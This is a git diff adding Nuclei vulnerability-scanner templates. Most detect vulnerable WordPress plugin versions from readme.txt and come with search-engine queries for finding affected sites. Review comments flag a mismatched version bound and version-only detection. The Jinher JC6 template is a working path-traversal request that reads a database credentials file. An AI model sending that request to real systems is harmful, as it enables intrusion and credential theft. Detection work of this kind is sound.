1.0.7') \ No newline at end of file diff --git a/poc/other/bukza-1d18f7cdcaadc800f7e99e165e820759.yaml b/poc/other/bukza-1d18f7cdcaadc800f7e99e165e820759.yaml new file mode 100644 index 0000000000..f1d0bbd72d --- /dev/null +++ b/poc/other/bukza-1d18f7cdcaadc800f7e99e165e820759.yaml 
@@ -0,0 +1,59 @@ +id: bukza-1d18f7cdcaadc800f7e99e165e820759 + +info: + name: > + Bukza <= 2.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3e348b24-4c49-43ed-b4f3-b31f0f709830?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bukza/" + google-query: inurl:"/wp-content/plugins/bukza/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bukza,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bukza/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bukza" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.0') \ No newline at end of file diff --git a/poc/other/bulk-role-change.yaml b/poc/other/bulk-role-change.yaml new file mode 100644 index 0000000000..d838b40aa8 --- /dev/null +++ b/poc/other/bulk-role-change.yaml 
@@ -0,0 +1,59 @@ +id: bulk-role-change-2184325438ba670b61cd9b6f6df928fc + +info: + name: > + Bulk Change Role <= 1.1 - Missing Authorization to Authenticated (Subscriber+) Privilege Escalation + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e6e7889b-a1e2-439f-891d-c7c9a052cafc?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bulk-role-change/" + google-query: inurl:"/wp-content/plugins/bulk-role-change/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bulk-role-change,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bulk-role-change/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bulk-role-change" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/other/cb-logo-slider.yaml b/poc/other/cb-logo-slider.yaml new file mode 100644 index 0000000000..fa419d9cf3 --- /dev/null +++ b/poc/other/cb-logo-slider.yaml 
@@ -0,0 +1,59 @@ +id: cb-logo-slider-6fc89698423781c51940a6f041af1e11 + +info: + name: > + Logo Slider <= 4.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6cc17a6-994c-4ac4-8175-263add849b1b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cb-logo-slider/" + google-query: inurl:"/wp-content/plugins/cb-logo-slider/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cb-logo-slider,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cb-logo-slider/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cb-logo-slider" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.0') \ No newline at end of file diff --git a/poc/other/companion-portfolio-99848fed06847f56568685ec4d7abf53.yaml b/poc/other/companion-portfolio-99848fed06847f56568685ec4d7abf53.yaml new file mode 100644 index 0000000000..ef222c6862 --- /dev/null +++ b/poc/other/companion-portfolio-99848fed06847f56568685ec4d7abf53.yaml 
@@ -0,0 +1,59 @@ +id: companion-portfolio-99848fed06847f56568685ec4d7abf53 + +info: + name: > + Companion Portfolio – Responsive Portfolio Plugin <= 2.4.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/21df75e6-1f3e-4a08-a620-92b44fb48899?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/companion-portfolio/" + google-query: inurl:"/wp-content/plugins/companion-portfolio/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,companion-portfolio,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/companion-portfolio/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "companion-portfolio" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.0.1') \ No newline at end of file diff --git a/poc/other/connatix-video-embed-078fbbdf831b8258d6e8b451d9e7fb0e.yaml b/poc/other/connatix-video-embed-078fbbdf831b8258d6e8b451d9e7fb0e.yaml new file mode 100644 index 0000000000..0abd00e344 --- /dev/null +++ b/poc/other/connatix-video-embed-078fbbdf831b8258d6e8b451d9e7fb0e.yaml 
@@ -0,0 +1,59 @@ +id: connatix-video-embed-078fbbdf831b8258d6e8b451d9e7fb0e + +info: + name: > + Connatix Video Embed <= 1.0.5 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/89512190-a0fe-495a-9dda-8d8540a5325c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/connatix-video-embed/" + google-query: inurl:"/wp-content/plugins/connatix-video-embed/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,connatix-video-embed,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/connatix-video-embed/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "connatix-video-embed" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.5') \ No newline at end of file diff --git a/poc/other/crafthemes-demo-import-3d9ed4f73a1e8e89ff28ad42207f57cc.yaml b/poc/other/crafthemes-demo-import-3d9ed4f73a1e8e89ff28ad42207f57cc.yaml new file mode 100644 index 0000000000..750ae36213 --- /dev/null +++ b/poc/other/crafthemes-demo-import-3d9ed4f73a1e8e89ff28ad42207f57cc.yaml 
@@ -0,0 +1,59 @@ +id: crafthemes-demo-import-3d9ed4f73a1e8e89ff28ad42207f57cc + +info: + name: > + Crafthemes Demo Import <= 3.3 - Authenticated (Admin+) Arbitrary File Upload in process_uploaded_files + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e44dd0e8-e6e7-4a2d-b9ca-abd1de273092?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/crafthemes-demo-import/" + google-query: inurl:"/wp-content/plugins/crafthemes-demo-import/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,crafthemes-demo-import,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/crafthemes-demo-import/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "crafthemes-demo-import" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3') \ No newline at end of file diff --git a/poc/other/designer.yaml b/poc/other/designer.yaml new file mode 100644 index 0000000000..208803512b --- /dev/null +++ b/poc/other/designer.yaml 
@@ -0,0 +1,59 @@ +id: designer-7fce07176e5a99557088287ca81287a3 + +info: + name: > + Designer <= 1.3.3 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/47a67db6-cc0d-47d2-a2c2-11b8c410f2fb?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/designer/" + google-query: inurl:"/wp-content/plugins/designer/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,designer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/designer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "designer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.3') \ No newline at end of file diff --git a/poc/other/dsdownloadlist.yaml b/poc/other/dsdownloadlist.yaml new file mode 100644 index 0000000000..74a50c5aea --- /dev/null +++ b/poc/other/dsdownloadlist.yaml 
@@ -0,0 +1,59 @@ +id: dsdownloadlist-563c0ddc96003b5bd029f38391d35cf2 + +info: + name: > + DS.DownloadList <= 1.3 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/600aef49-b918-4d58-a460-f9cdbeaa17dd?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/dsdownloadlist/" + google-query: inurl:"/wp-content/plugins/dsdownloadlist/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,dsdownloadlist,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/dsdownloadlist/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "dsdownloadlist" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/other/eveeno-57163addaabbee05984ca77e6d31881e.yaml b/poc/other/eveeno-57163addaabbee05984ca77e6d31881e.yaml new file mode 100644 index 0000000000..c86f67f197 --- /dev/null +++ b/poc/other/eveeno-57163addaabbee05984ca77e6d31881e.yaml 
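Review bot: `severity: critical` is reported on nothing more than the `Stable tag` value in `readme.txt` satisfying `compare_versions(version, '<= 1.3')`; the template never checks the affected functionality itself. A readme can be stale, can carry a tag that does not match the installed code, or can remain on disk after the plugin is deactivated, so a hit means "reported version is in range", not "confirmed vulnerable". I would state that in the currently empty `description`, e.g. `Version-based detection from readme.txt; confirm the installed version before acting on this finding.` The high-severity fluentform and newspack-plugin templates, and the rest of the readme-based templates here, share this.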
@@ -0,0 +1,59 @@ +id: eveeno-57163addaabbee05984ca77e6d31881e + +info: + name: > + Eveeno <= 1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e254f0ba-9008-44e9-bf8f-31c9614d6f64?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/eveeno/" + google-query: inurl:"/wp-content/plugins/eveeno/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,eveeno,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/eveeno/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "eveeno" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7') \ No newline at end of file diff --git a/poc/other/fat-services-booking.yaml b/poc/other/fat-services-booking.yaml new file mode 100644 index 0000000000..b11ead2b5e --- /dev/null +++ b/poc/other/fat-services-booking.yaml 
@@ -0,0 +1,59 @@ +id: fat-services-booking-b49b9540b1d61d0bb6646887776106fb + +info: + name: > + FAT Services Booking <= 5.6 - Authenticated (Subscriber+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b03125e6-689b-46d7-8a39-3260d46fb17d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/fat-services-booking/" + google-query: inurl:"/wp-content/plugins/fat-services-booking/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,fat-services-booking,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fat-services-booking/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fat-services-booking" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.6') \ No newline at end of file diff --git a/poc/other/fluentform-73d12813260178303738b5378f138bfb.yaml b/poc/other/fluentform-73d12813260178303738b5378f138bfb.yaml new file mode 100644 index 0000000000..94ce5237ad --- /dev/null +++ b/poc/other/fluentform-73d12813260178303738b5378f138bfb.yaml 
@@ -0,0 +1,59 @@ +id: fluentform-73d12813260178303738b5378f138bfb + +info: + name: > + Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.2.6 - Unauthenticated Stored Cross-Site Scripting via Form Subject + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/41c2ec31-360d-4145-b0b4-77d4d1d4b8a1?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/fluentform/" + google-query: inurl:"/wp-content/plugins/fluentform/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,fluentform,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fluentform" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2.6') \ No newline at end of file diff --git a/poc/other/full-screen-page-background-image-slideshow.yaml b/poc/other/full-screen-page-background-image-slideshow.yaml new file mode 100644 index 0000000000..45377647ba --- /dev/null +++ b/poc/other/full-screen-page-background-image-slideshow.yaml 
@@ -0,0 +1,59 @@ +id: full-screen-page-background-image-slideshow-6def5bf7385a589549cc6977b19eb2ae + +info: + name: > + Full Screen (Page) Background Image Slideshow <= 1.1 Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bf2ffdb1-fe10-475b-9c05-553a95d7b3bc?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/full-screen-page-background-image-slideshow/" + google-query: inurl:"/wp-content/plugins/full-screen-page-background-image-slideshow/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,full-screen-page-background-image-slideshow,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/full-screen-page-background-image-slideshow/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "full-screen-page-background-image-slideshow" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/other/ganohrs-toggle-shortcode-9c361274065595fa7c1b34cfc52539a1.yaml b/poc/other/ganohrs-toggle-shortcode-9c361274065595fa7c1b34cfc52539a1.yaml new file mode 100644 index 0000000000..8c3838e0fb --- /dev/null +++ b/poc/other/ganohrs-toggle-shortcode-9c361274065595fa7c1b34cfc52539a1.yaml 
@@ -0,0 +1,59 @@ +id: ganohrs-toggle-shortcode-9c361274065595fa7c1b34cfc52539a1 + +info: + name: > + Ganohrs Toggle Shortcode <= 0.2.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/efd49905-0f2c-44b7-85c6-c2b77440ac17?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ganohrs-toggle-shortcode/" + google-query: inurl:"/wp-content/plugins/ganohrs-toggle-shortcode/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ganohrs-toggle-shortcode,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ganohrs-toggle-shortcode/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ganohrs-toggle-shortcode" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.2.4') \ No newline at end of file diff --git a/poc/other/get-post-content-shortcode-b22e11dd16a8eba4c44d1ec8159b3556.yaml b/poc/other/get-post-content-shortcode-b22e11dd16a8eba4c44d1ec8159b3556.yaml new file mode 100644 index 0000000000..85250bf3b3 --- /dev/null +++ b/poc/other/get-post-content-shortcode-b22e11dd16a8eba4c44d1ec8159b3556.yaml 
@@ -0,0 +1,59 @@ +id: get-post-content-shortcode-b22e11dd16a8eba4c44d1ec8159b3556 + +info: + name: > + Get Post Content Shortcode <= 0.4 - Insecure Direct Object Reference to Authenticated (Contributor+) Sensitive Information Disclosure via post_content Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b92091-e615-484f-b402-2e793eed214d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/get-post-content-shortcode/" + google-query: inurl:"/wp-content/plugins/get-post-content-shortcode/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,get-post-content-shortcode,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/get-post-content-shortcode/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "get-post-content-shortcode" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.4') \ No newline at end of file diff --git a/poc/other/glomex-oembed-2234b2001bef09d3310372cf737d335d.yaml b/poc/other/glomex-oembed-2234b2001bef09d3310372cf737d335d.yaml new file mode 100644 index 0000000000..d003b0787a --- /dev/null +++ b/poc/other/glomex-oembed-2234b2001bef09d3310372cf737d335d.yaml 
@@ -0,0 +1,59 @@ +id: glomex-oembed-2234b2001bef09d3310372cf737d335d + +info: + name: > + glomex oEmbed <= 0.9.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e57cf85-eec0-4cf6-a800-ceb2b46e2bcd?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/glomex-oembed/" + google-query: inurl:"/wp-content/plugins/glomex-oembed/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,glomex-oembed,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/glomex-oembed/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "glomex-oembed" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.9.1') \ No newline at end of file diff --git a/poc/other/gmw-premium-settings.yaml b/poc/other/gmw-premium-settings.yaml new file mode 100644 index 0000000000..32f268b45b --- /dev/null +++ b/poc/other/gmw-premium-settings.yaml 
@@ -0,0 +1,59 @@ +id: gmw-premium-settings-dd2bed6814a3bf62f3d77a7f20807d63 + +info: + name: > + GEO My WordPress <= 4.4.0.2 - Authenticated (Admin+) Arbitrary File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e8214cdd-3a7d-40ce-9645-7dbd6e8f037f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/gmw-premium-settings/" + google-query: inurl:"/wp-content/plugins/gmw-premium-settings/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,gmw-premium-settings,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gmw-premium-settings/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gmw-premium-settings" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 3.1') \ No newline at end of file diff --git a/poc/other/hello-in-all-languages.yaml b/poc/other/hello-in-all-languages.yaml new file mode 100644 index 0000000000..dc0ecc00d4 --- /dev/null +++ b/poc/other/hello-in-all-languages.yaml 
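Review bot: The version check `compare_versions(version, '< 3.1')` does not match the range in the title, `GEO My WordPress <= 4.4.0.2`. As written, an install whose readme reports anything from 3.1 up to 4.4.0.2 is not flagged, even though the title says it is affected. The slug `gmw-premium-settings` also differs from the product named in the title, so the two may be versioned separately. Whichever is intended, the title and the matcher should state the same bound, e.g. `compare_versions(version, '<= 4.4.0.2')` if the title is the correct one.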
@@ -0,0 +1,59 @@ +id: hello-in-all-languages-b021d6b8c28aeac89d4ee418f75211e9 + +info: + name: > + Hello in All Languages <= 1.0.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/85501fc0-5d51-492b-b208-4b84f371ee77?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/hello-in-all-languages/" + google-query: inurl:"/wp-content/plugins/hello-in-all-languages/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,hello-in-all-languages,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/hello-in-all-languages/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "hello-in-all-languages" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.6') \ No newline at end of file diff --git a/poc/other/hits-counter.yaml b/poc/other/hits-counter.yaml new file mode 100644 index 0000000000..1b20d102c0 --- /dev/null +++ b/poc/other/hits-counter.yaml 
@@ -0,0 +1,59 @@ +id: hits-counter-cc939d1b6fabefd87c8b2ff2ea159694 + +info: + name: > + Post Hits Counter <= 2.8.23 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/746bf178-5e1b-4f1a-8072-d0c1be005f88?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/hits-counter/" + google-query: inurl:"/wp-content/plugins/hits-counter/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,hits-counter,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/hits-counter/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "hits-counter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.23') \ No newline at end of file diff --git a/poc/other/import-eventbrite-events-fbff3ca801016ea3ccdd49c17eb80e43.yaml b/poc/other/import-eventbrite-events-fbff3ca801016ea3ccdd49c17eb80e43.yaml new file mode 100644 index 0000000000..9ec272a196 --- /dev/null +++ b/poc/other/import-eventbrite-events-fbff3ca801016ea3ccdd49c17eb80e43.yaml 
@@ -0,0 +1,59 @@ +id: import-eventbrite-events-fbff3ca801016ea3ccdd49c17eb80e43 + +info: + name: > + Import Eventbrite Events <= 1.7.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f799db97-ca61-439d-94ec-a44270d1cd07?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/import-eventbrite-events/" + google-query: inurl:"/wp-content/plugins/import-eventbrite-events/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,import-eventbrite-events,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/import-eventbrite-events/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "import-eventbrite-events" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.4') \ No newline at end of file diff --git a/poc/other/jinher-JC6-oaplusrangedownloadfile-filedownload.yaml b/poc/other/jinher-JC6-oaplusrangedownloadfile-filedownload.yaml new file mode 100644 index 0000000000..c15d99f4e4 --- /dev/null +++ b/poc/other/jinher-JC6-oaplusrangedownloadfile-filedownload.yaml 
@@ -0,0 +1,19 @@
+id: jinher-JC6-oaplusrangedownloadfile-filedownload
+
+info:
+ name: jinher-JC6-oaplusrangedownloadfile-filedownload
+ author: PokerSec
+ severity: high
+ metadata:
+ fofasearch: body="/jc6/platform/"
+
+http:
+ - raw:
+ - |
+ GET /jc6/JHSoft.WCF/login/oaplusrangedownloadfile?filename=../WEB-INF/classes/db.properties HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code==200 && contains_all(body,"jc6.config") && contains_all(body,"jdbc.password")
\ No newline at end of file
diff --git a/poc/other/jiusi-oa-dl-fileread.yaml b/poc/other/jiusi-oa-dl-fileread.yaml
new file mode 100644
index 0000000000..7547e00164
--- /dev/null
